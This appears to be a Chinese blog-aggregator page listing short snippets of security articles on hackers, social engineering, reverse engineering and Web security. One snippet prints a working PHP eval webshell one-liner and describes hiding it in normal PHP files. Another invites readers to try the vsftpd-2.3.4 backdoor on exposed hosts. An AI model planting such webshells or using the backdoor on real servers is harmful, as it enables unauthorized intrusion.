对于社工,玩黑的朋友并不陌生。社工,一直很强大,我想有很多朋友应该都知道“凯文米特尼克”,并且将他的故事改编了一部电影叫《骇客追缉令》,里面就用到了社工。并且还著有一本很有名的社工书籍《欺骗的艺术》。那么面对这复杂的网络安全,我们很有必要去学习了解下社工,以提升自己的网络安全意识,最大程度的去保障自 ...
分类:
其他好文 时间:
2018-01-07 14:27:25
阅读次数:
199
vsftpd-2.3.4早期版本存在恶意的后门,在钟馗之眼上目前骇客以收到如此的主机,不过很多的服务器都已经被修复过,但总有漏网之鱼,有兴趣的小伙伴不妨去试试 0×01前言: vsftpd-2.3.4早期版本存在恶意的后门,在钟馗之眼上目前骇客以收到如此的主机,不过很多的服务器都已经被修复过,但总有 ...
分类:
其他好文 时间:
2017-08-07 18:31:49
阅读次数:
295
一名黑客(hacker)是一个喜欢用智力通过创造性方法来挑战脑力极限的人,特别是他们所感兴趣的领域,例如电脑编程或电器工程。黑客和骇客是截然不同得;黑客和骇客根本的区别是:黑客们修补漏洞,而骇客们利用漏洞进行破坏。也有人叫黑客作Hacker。黑客一词一般有以下四种意义:..
分类:
其他好文 时间:
2017-07-02 00:05:56
阅读次数:
301
什么是逆向工程 欲知逆向,先懂正向!!! 我们正常写程序的过程,可以叫做正向,例如:用C++写一个程序,是从C++一层层编译到 0 1代码变成可执行程序的。 逆向工程就是和正向相反的,是从0 1 代码变成人类可懂的代码。 为什么需要逆向工程 随着互联网的发展和网络设备的普及,网络安全越发的重要,骇客 ...
分类:
其他好文 时间:
2017-04-24 21:21:01
阅读次数:
199
大家都认为Linux默认是安全的,我大体是认可的(这是个有争议的话题)。Linux默认确实有内置的安全模型。你需要打开它并且对其进行定制,这样才能得到更安全的系统。Linux更难管理,不过相应也更灵活,有更多的配置选项。对于系统管理员,让产品的系统更安全,免于骇客和黑客的攻..
分类:
系统相关 时间:
2017-03-30 14:20:35
阅读次数:
262
第1章我的安全世界观1.1web安全简史1.1.1中国黑客简史现在中国乃至全世界的黑客或者说是骇客已经进入了“黑暗时代”,因为互联网存在这大量的利益。1.1.2黑客技术的发展历程1.1.3web安全的兴起web安全是信息安全领域的一个重要的分支,但是中国目前对web安全的重视程度远远不足..
分类:
Web程序 时间:
2016-10-09 00:51:12
阅读次数:
229
CEH(Certificated Ethical Hacker)被业界称之为道德骇客(正派黑客)认证。 它是一个中立的技术认证,延自美国联邦调查局(FBI)训练人才课程。黑客攻防是信息安全领域中,最引人注意的部分,CEH就是学习如何面对并防范骇客的攻击行为,不但要了解病毒、木马或蠕虫入侵行为,更要培... ...
分类:
其他好文 时间:
2016-09-30 01:56:23
阅读次数:
241
转自:http://www.jb51.net/article/46163.htm 在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。 一、 ...
分类:
数据库 时间:
2016-07-12 19:26:37
阅读次数:
217
原文出处:http://my.oschina.net/longquan/blog/155905 首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen ...
分类:
Web程序 时间:
2016-06-30 14:14:50
阅读次数:
177
不算前言的前言 好像已经很久没有写过安全方面的文章了,所谓安全圈子里面,大家也许认为玄猫消失了,不过,我想,作为骇客的玄猫也许从来没有出现过吧。没错的,我是玄猫,如果前两年你看过《黑客X档案》或者《黑客手册》这样的民间安全杂志,那么你也许见过这个名字。 或者,很抱歉的,你的站点有时会出现过“玄猫啊玄 ...
分类:
其他好文 时间:
2016-06-13 13:21:38
阅读次数:
215
